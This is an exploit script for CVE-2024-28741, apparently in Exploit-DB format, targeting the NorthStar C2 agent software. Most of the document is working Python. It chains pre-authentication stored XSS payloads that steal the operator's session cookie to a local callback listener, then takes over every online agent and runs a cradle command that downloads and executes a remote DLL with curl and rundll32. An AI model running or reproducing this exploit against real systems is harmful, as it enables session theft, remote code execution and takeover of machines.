NorthStar C2 Agent 1.0 Cross Site Scripting / Remote Command Execution

# Exploit Title: NorthStar C2 agent RCE via stored XSS# Date: 2024-03-11# Exploit Author: @_chebuya# Software Link: https://github.com/EnginDemirbilek/NorthStarC2# Version: v1.0# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-28741# Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page.  This XSS can be leveraged to execute commands on NorthStar C2 agents# Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/from http.server import BaseHTTPRequestHandler, HTTPServerfrom bs4 import BeautifulSoupimport requestsimport base64import threadingimport timeimport osclass Collector(BaseHTTPRequestHandler):    def do_GET(self):        cookie = self.path.split("=")[1]        print("Cookie: " + cookie)        self.send_response(200)        self.end_headers()        self.wfile.write(b"")        background_thread = threading.Thread(target=steal_agents, args=(cookie,))        background_thread.start()        self.server.shutdown()def agent_execute_command(agent_id, csrf_token, headers, command):    data = {        'slave': agent_id,        'command': command,        'sid': agent_id,        'token': csrf_token    }    r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)    while True:        r = requests.get(target_url +  f"/getresponse.php?slave={agent_id}", headers=headers)        if len(r.text) != 0 or command == "die":            break                time.sleep(1)def steal_agents(cookie):    headers = {        "Cookie": f"PHPSESSID={cookie}"    }    r = requests.get(target_url + "/clients.php", headers=headers)    soup = BeautifulSoup(r.text, 'html.parser')    rows = soup.find_all('tr')    agent_ids = []    hostnames = []    for row in rows:        cells = row.find_all('td')        if len(cells) != 9:            continue        status = cells[7].text.strip()        if status != 'Online':            continue        agent_ids.append(cells[1].text.strip())        hostnames.append(cells[5].text.strip())    script_tags = soup.find_all('script')    csrf_token = None    for script_tag in script_tags:        if 'csrfToken' in script_tag.text:            csrf_token = script_tag.text.split('"')[1]            break    if csrf_token:        print("CSRF Token:", csrf_token)    else:        print("CSRF Token not found")        return    for i in range(len(agent_ids)):        agent_id = agent_ids[i]        hostname = hostnames[i]        print(f"Stealing {hostname} ({agent_id})...")        print("Enabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "enablecmd")        print(f"Running sliver cradle: {cradle_command}")        agent_execute_command(agent_id, csrf_token, headers, cradle_command)        print("Disabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "disablecmd")        print("Sending suicide to slave")        agent_execute_command(agent_id, csrf_token, headers, "die")        print("Exploit finished, exiting")    os._exit(0)def xor_encryption(text, key):    encrypted_text = ""        for i in range(len(text)):        encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))        return encrypted_textdef generate_sid(sid):    encrypted_sid = xor_encryption(sid, "northstar")    return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()def exploit(target_url, callback_url):    target_url = target_url.rstrip("/") + "/login.php"    protocol = callback_url.split(":")[0] + "://"    host = callback_url.split("/")[2].split(":")[0]    h1, h2 = host[:len(host)//2], host[len(host)//2:]        if callback_url.count(":") == 2:        port = callback_url.split(":")[2]    else:        if protocol == "https://":            port = "443"        else:            port = "80"    sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]    for sid in sid_payloads:        print(sid)        params = {            'sid': generate_sid(sid)        }        requests.get(target_url, params=params, verify=False)def run(port):    server_address = ('', int(port))    httpd = HTTPServer(server_address, Collector)    print(f'Server running on port {port}')    httpd.serve_forever()cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"callback_host = "192.168.1.6"callback_port = "8080"target_url = "http://192.168.1.4:80"callback_url = f"http://{callback_host}:{callback_port}"print("Sending malicious agent registrations...")exploit(target_url, callback_url)print("Registrations finished, waiting for execution...")run(callback_port)